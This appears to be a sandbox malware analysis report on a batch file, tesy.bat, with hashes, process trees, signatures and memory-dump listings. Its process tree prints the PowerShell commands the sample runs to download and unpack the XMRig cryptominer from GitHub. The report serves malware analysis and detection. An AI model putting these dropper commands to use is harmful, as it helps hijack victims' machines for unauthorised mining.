97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

General

Target

tesy.bat
Size

608B
MD5

727c8da0478af118c957ae60f7161cab
SHA1

cf18105b8659e93bbd2824fa35ef1bae7b395301
SHA256

97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
SHA512

d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
1308	powershell.exe
1308	powershell.exe
1308	powershell.exe
2284	powershell.exe
2284	powershell.exe
2284	powershell.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3804 wrote to memory of 4916	3804	cmd.exe	75
PID 3804 wrote to memory of 4916	3804	cmd.exe	75
PID 3804 wrote to memory of 3460	3804	cmd.exe	76
PID 3804 wrote to memory of 3460	3804	cmd.exe	76
PID 1616 wrote to memory of 1308	1616	cmd.exe	82
PID 1616 wrote to memory of 1308	1616	cmd.exe	82
PID 1616 wrote to memory of 2284	1616	cmd.exe	83
PID 1616 wrote to memory of 2284	1616	cmd.exe	83
PID 4720 wrote to memory of 4624	4720	cmd.exe	86
PID 4720 wrote to memory of 4624	4720	cmd.exe	86

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3460

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tesy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tesy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4624

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cce615d15461e157f3fc35942fd55a75

SHA1
95a469a90958f028ef969ec983a2f680b27c2dd9

SHA256
6660f02eb4ae6ef508d77535d6bd9749ed798084171e9bad01ac955052fbecf6

SHA512
c3a57413a24009cc8c3df0a4800f1047dbd2ee8010f16e8e640f03685f0e1a2e475c1dd132f52af39c328103f89684adb5cc87890e939185ac34cc321d89f03c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f6496b20f43a4f3ea6a223db3c279406

SHA1
4f2b5a62e37a5e796d9cbb1c89113b4de162dc3e

SHA256
53ba051485927f6a0c1c16576dc290713db80481d3eb8e15c9b2a96c3f391516

SHA512
d651aed98f3a12805d42ad0c96819c8eff6df8fccbfaac1e75449d3989edb4994642a01439c12b17dadab988b97851ce901bf1b7f83e6f4ee20d627bbccd9fea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ffc3da45178a2f84fb2198ddcaa8ca99

SHA1
f9bf8ec9e5a66fc3f23b76e99ceee9f1cf7a40b4

SHA256
d585063f8ec544c04ade6b750da8c5de0bc61bd74c39b76598ce73abe10b4c78

SHA512
1dc71beaea8c42ebf844b30b5a50e393397c660f853e6a918572ac6d00dc1da8b78376b0c0aaf5de1dff12c55a8eb13efd2b4ea36c9a9bd144fb258dcc675824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1a615e065de48d335e8cd0c576009ec

SHA1
25e170cc2834d76469e2a9cb1e794874d2e38770

SHA256
12b76e0d92369e3b84a4fe2b43895291f346afccc609316fa9940bfdddb92427

SHA512
a57cc939561c35aed005ee8aa21f7ece6c67c524395b7fb2eeaff1375bc0059e0dccbc11b0fc690236d865279147bdb8decec99f8353a2d55ee7c53eed6ac1b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h2khoct.2a5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1308-186-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/1308-185-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/1308-151-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/1308-184-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/1308-171-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/1308-187-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/1308-190-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/1308-153-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/1308-152-0x000001EC7AD70000-0x000001EC7AD80000-memory.dmp

Filesize
64KB

Download
memory/2284-197-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/2284-198-0x00000239F3A90000-0x00000239F3AA0000-memory.dmp

Filesize
64KB

Download
memory/2284-294-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/2284-291-0x00000239F3A90000-0x00000239F3AA0000-memory.dmp

Filesize
64KB

Download
memory/2284-221-0x00000239F3A90000-0x00000239F3AA0000-memory.dmp

Filesize
64KB

Download
memory/2284-200-0x00000239F3A90000-0x00000239F3AA0000-memory.dmp

Filesize
64KB

Download
memory/3460-46-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/3460-146-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/3460-143-0x000002373E800000-0x000002373E810000-memory.dmp

Filesize
64KB

Download
memory/3460-73-0x000002373E800000-0x000002373E810000-memory.dmp

Filesize
64KB

Download
memory/3460-49-0x000002373E800000-0x000002373E810000-memory.dmp

Filesize
64KB

Download
memory/3460-47-0x000002373E800000-0x000002373E810000-memory.dmp

Filesize
64KB

Download
memory/4624-300-0x0000014B27AF0000-0x0000014B27B00000-memory.dmp

Filesize
64KB

Download
memory/4624-299-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/4624-301-0x0000014B27AF0000-0x0000014B27B00000-memory.dmp

Filesize
64KB

Download
memory/4624-319-0x0000014B27AF0000-0x0000014B27B00000-memory.dmp

Filesize
64KB

Download
memory/4916-5-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/4916-6-0x0000022D33210000-0x0000022D33220000-memory.dmp

Filesize
64KB

Download
memory/4916-7-0x0000022D33210000-0x0000022D33220000-memory.dmp

Filesize
64KB

Download
memory/4916-10-0x0000022D33470000-0x0000022D334E6000-memory.dmp

Filesize
472KB

Download
memory/4916-25-0x0000022D33210000-0x0000022D33220000-memory.dmp

Filesize
64KB

Download
memory/4916-41-0x00007FFAA9150000-0x00007FFAA9B3C000-memory.dmp

Filesize
9.9MB

Download
memory/4916-4-0x0000022D33250000-0x0000022D33272000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing